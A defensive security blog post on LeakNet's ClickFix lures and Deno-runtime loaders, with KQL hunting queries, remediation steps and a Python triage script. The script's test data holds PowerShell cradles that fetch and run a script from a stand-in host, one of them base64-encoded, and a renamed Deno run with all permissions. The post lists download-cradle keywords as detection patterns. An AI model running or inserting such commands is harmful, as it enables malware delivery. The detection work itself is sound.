
Defending Against LeakNet: Detecting ClickFix Attacks and Malicious Deno Runtime Usage

Security Arsenal Team
March 17, 2026


Threat actors increasingly combine social engineering with legitimate development tools to get past endpoint defenses. A recent example is the LeakNet ransomware gang, which has adopted the "ClickFix" technique for initial access and uses the Deno runtime as a stealthy malware loader. For IT and security teams, understanding this hybrid approach is critical to keeping the intrusion from reaching the encryption stage.

Introduction

The LeakNet gang represents a growing trend of threat actors who leverage "living-off-the-land" (LotL) tactics. Instead of relying solely on custom malware, they are abusing legitimate software—in this case, the Deno runtime for JavaScript and TypeScript—to execute malicious code on victim networks.

This attack vector is particularly dangerous because it combines two distinct risks:

  1. ClickFix: A social engineering technique that tricks users into executing malicious commands via fake browser error messages or "update" prompts.
  2. Deno Runtime: A legitimate, signed application that security tools often trust, making it an effective cloak for malicious loaders.

Defenders must understand that traditional antivirus signatures may miss these attacks because the only new executable on disk is a clean, signed deno.exe; the malicious logic lives in a script that the runtime interprets. Proactive threat hunting and strict application controls are essential to stop these threats before encryption occurs.

Technical Analysis

The attack chain observed in recent LeakNet incidents follows a multi-stage process designed to evade detection:

  • Initial Access (ClickFix): The attack begins when a user lands on a compromised or malicious website. They are presented with a fraudulent browser error message (often mimicking Cloudflare or browser updates) claiming a network failure or verification error. The prompt instructs the user to run a specific "repair" command, which is actually a malicious PowerShell script.

  • Payload Delivery (Deno Runtime): Once the user executes the command, the script downloads and installs the Deno runtime rather than a custom .exe. Deno is a legitimate JavaScript and TypeScript runtime comparable to Node.js, with a permission model that denies file, network and subprocess access unless it is granted on the command line. That model offers no protection here: the attacker controls the command line and simply grants the loader whatever it needs (for example with -A / --allow-all).

  • Execution: The attackers use Deno to run a malicious JavaScript or TypeScript loader. Because deno.exe is a legitimate, signed development tool, its execution often passes basic heuristic and reputation checks. The loader then establishes communication with command-and-control (C2) servers and prepares the environment for the encryption payload.

Affected Systems & Severity:

  • Affected Systems: Windows-based environments using standard web browsers (Chrome, Edge, Firefox). The Deno runtime can run on Windows, Linux, and macOS, though these specific campaigns are primarily targeting Windows enterprise users.
  • Severity: High. A successful lure gives the attacker arbitrary code execution on the endpoint in the context of the logged-on user, which is the starting point for credential theft, lateral movement and ransomware deployment.

Defensive Monitoring

Detecting LeakNet activities requires monitoring for the unusual execution of the Deno runtime in enterprise environments and the specific PowerShell patterns associated with ClickFix. Below are KQL queries for Microsoft Sentinel/Defender to help identify suspicious activity.

1. Detecting Deno Execution (Unusual Process)

Most corporate environments do not use the Deno runtime for daily operations. Its presence on a standard endpoint is a strong anomaly that deserves triage; in organizations with JavaScript/TypeScript developers, exclude known developer hosts rather than drop the query. Matching on the file name alone is not enough, because the loader can rename the binary, so the query also checks the PE version information that Defender records.

Script / Code
DeviceProcessEvents
| where Timestamp > ago(7d)
// match by name and by PE original file name, so a renamed deno.exe is still caught
| where FileName =~ "deno.exe" or ProcessVersionInfoOriginalFileName =~ "deno.exe"
| project Timestamp, DeviceName, AccountName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

2. Hunting for ClickFix PowerShell Patterns

ClickFix attacks rely on the user pasting a command that downloads and runs content from the internet, usually into the Run dialog (Win+R), a terminal, or PowerShell itself. This query looks for PowerShell commands that contain a download cradle and a URL (a common step in deploying the Deno loader). Because the Run dialog is the usual path, an InitiatingProcessFileName of explorer.exe is a useful pivot when reviewing results. Note that a payload passed through -EncodedCommand will not match these strings; hunt for -enc / -EncodedCommand separately and decode the base64 (UTF-16LE) argument before judging it.

Script / Code
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe")
// download cradles plus the short aliases lures use to keep the pasted command small
| where ProcessCommandLine has_any ("Invoke-WebRequest", "iwr", "Invoke-RestMethod", "irm", "DownloadString", "DownloadFile", "Invoke-Expression", "IEX")
| where ProcessCommandLine contains "http"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
| limit 100

3. Monitoring for Script Files Executed via Deno

The loader itself runs inside deno.exe, so the script it was given appears in that process's command line rather than as a separate process. What this query catches is anything the loader spawns (cmd.exe, powershell.exe, discovery tools); the .js or .ts file that started it is visible in InitiatingProcessCommandLine.

Script / Code
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "deno.exe"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc
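To show how the three hunts above translate into logic you can test offline, here is an added Python example. It is not code from the original post or from Microsoft's tooling. It applies the same checks to constructed rows shaped like DeviceProcessEvents, and goes beyond the KQL in two ways the queries do not: it recognizes a renamed deno.exe through the PE OriginalFileName field, and it decodes -EncodedCommand arguments before looking for download cradles. The host names, accounts, paths, URLs and the DEV_HOSTS allowlist are all assumptions invented for the example.

```python
"""Offline triage of ClickFix / Deno indicators over constructed process events.

Added example, not code from the original post. SAMPLE_EVENTS is constructed to
look like Defender DeviceProcessEvents rows (same column names); every host,
account, path and URL in it is made up.
"""
import base64
import re

PS_NAMES = {"powershell.exe", "pwsh.exe"}
DEV_HOSTS = {"dev-ws01"}  # assumed allowlist of hosts where Deno use is expected

# Download cradles plus the aliases ClickFix lures use to keep the pasted command short.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:invoke-webrequest|invoke-restmethod|invoke-expression|iwr|irm|iex|"
    r"downloadstring|downloadfile|net\.webclient)\b", re.I)
URL = re.compile(r"https?://", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the base64 argument.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Deno flags that hand the loader the permissions the sandbox would otherwise withhold.
BROAD_PERMS = re.compile(r"(?:^|\s)(?:-A|--allow-all|--allow-run)(?:\s|$)")


def encode_command(script: str) -> str:
    """Encode a snippet the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # bad padding (binascii.Error) and bad UTF-16 both derive from ValueError
        return None


def deno_reasons(e: dict) -> list:
    """Query 1 and 3 logic: deno.exe by name or PE original name, broad permissions, children."""
    reasons = []
    name = e["FileName"].lower()
    original = e.get("ProcessVersionInfoOriginalFileName", "").lower()
    if name == "deno.exe" or original == "deno.exe":
        reasons.append("deno-binary" if name == "deno.exe" else "deno-binary-renamed")
        if BROAD_PERMS.search(e["ProcessCommandLine"]):
            reasons.append("deno-broad-permissions")
    if e["InitiatingProcessFileName"].lower() == "deno.exe":
        reasons.append("deno-child-process")
    return reasons


def powershell_reasons(e: dict) -> list:
    """Query 2 logic, extended to look inside -EncodedCommand payloads."""
    if e["FileName"].lower() not in PS_NAMES:
        return []
    cmd = e["ProcessCommandLine"]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd} {decoded}"
    reasons = []
    if DOWNLOAD_CRADLE.search(text) and URL.search(text):
        reasons.append("clickfix-cradle")
        if decoded is not None:
            reasons.append("encoded-command")
        if e["InitiatingProcessFileName"].lower() == "explorer.exe":
            reasons.append("run-dialog-parent")  # pasted into Win+R, the usual ClickFix path
    return reasons


def triage(events):
    """Return one finding per event that trips any check; Deno checks skip allowlisted hosts."""
    findings = []
    for e in events:
        reasons = powershell_reasons(e)
        if e["DeviceName"] not in DEV_HOSTS:
            reasons += deno_reasons(e)
        if reasons:
            findings.append({"DeviceName": e["DeviceName"], "AccountName": e["AccountName"],
                             "FileName": e["FileName"], "reasons": reasons})
    return findings


def row(device, account, file, parent, cmd, original=None):
    """Build one constructed DeviceProcessEvents-style row."""
    return {"DeviceName": device, "AccountName": account, "FileName": file,
            "InitiatingProcessFileName": parent, "ProcessCommandLine": cmd,
            "ProcessVersionInfoOriginalFileName": original or file}


SAMPLE_EVENTS = [  # constructed; nothing here is from a real incident
    # 1: developer host where Deno is expected (suppressed by DEV_HOSTS)
    row("dev-ws01", "alice", "deno.exe", "code.exe", "deno run --allow-net server.ts"),
    # 2: plain ClickFix cradle pasted into the Run dialog
    row("fin-lt07", "bob", "powershell.exe", "explorer.exe",
        'powershell -w hidden -c "iex (iwr http://verify.example.invalid/fix.ps1 -UseBasicParsing)"'),
    # 3: the same cradle hidden behind -EncodedCommand (the plain KQL string match misses this)
    row("fin-lt07", "bob", "powershell.exe", "explorer.exe",
        "powershell -nop -w hidden -EncodedCommand "
        + encode_command("iex (irm http://verify.example.invalid/fix.ps1)")),
    # 4: Deno renamed by the loader and started with every permission granted
    row("fin-lt07", "bob", "svchost32.exe", "powershell.exe",
        r"svchost32.exe run -A C:\Users\bob\AppData\Local\Temp\ld.ts", original="deno.exe"),
    # 5: a shell spawned from inside the Deno loader
    row("fin-lt07", "bob", "cmd.exe", "deno.exe", "cmd.exe /c whoami /all"),
    # 6: ordinary admin PowerShell use, should not be flagged
    row("hr-lt02", "carol", "powershell.exe", "cmd.exe", "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['DeviceName']:<10} {f['AccountName']:<7} {f['FileName']:<16} {', '.join(f['reasons'])}")
```

Running the script flags rows 2 through 5 and leaves the developer host and the benign Get-Date call alone. The two additions worth carrying back into KQL are the ProcessVersionInfoOriginalFileName check and the decoding step: a renamed binary or a base64 payload is exactly the kind of cheap evasion that turns a name-and-string hunt into a blind spot.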

Remediation

To protect your organization against LeakNet and similar ClickFix/Deno attacks, Security Arsenal recommends the following actionable steps:

  1. Application Allowlisting: Implement strict allowlisting policies (e.g., Microsoft Defender Application Control or AppLocker). If your organization does not develop software using JavaScript/TypeScript, explicitly block the execution of deno.exe and similar runtimes such as node.exe on user endpoints. A default-deny policy also breaks the delivery step itself, because the loader installs Deno into a user-writable directory that the default rules do not allow to execute from.

  2. User Education and Awareness: Train employees to recognize social engineering tactics, specifically the "ClickFix" technique. Users should be instructed to:

    • Never run commands from browser pop-ups claiming to be error codes, verification checks or network fixes.
    • Immediately report any web page that asks them to open the Run dialog (Win+R), paste a command into PowerShell or a terminal, or "fix" a problem by running something.
  3. Restrict PowerShell Usage: Enforce Constrained Language Mode for non-administrative users (it is applied automatically once a WDAC or AppLocker policy is enforced), and enable PowerShell script block logging so that encoded or obfuscated commands are recorded in decoded form for the hunts above.

  4. Web Filtering: Configure secure web gateways to block access to known malicious domains and IP addresses associated with LeakNet infrastructure, and block downloads of executables and scripts from uncategorized or newly registered domains.

  5. Patch Management: Ensure browsers and operating systems are up to date. While this attack abuses functionality rather than a specific vulnerability, updated browsers often include improved fraud and phishing protection features.

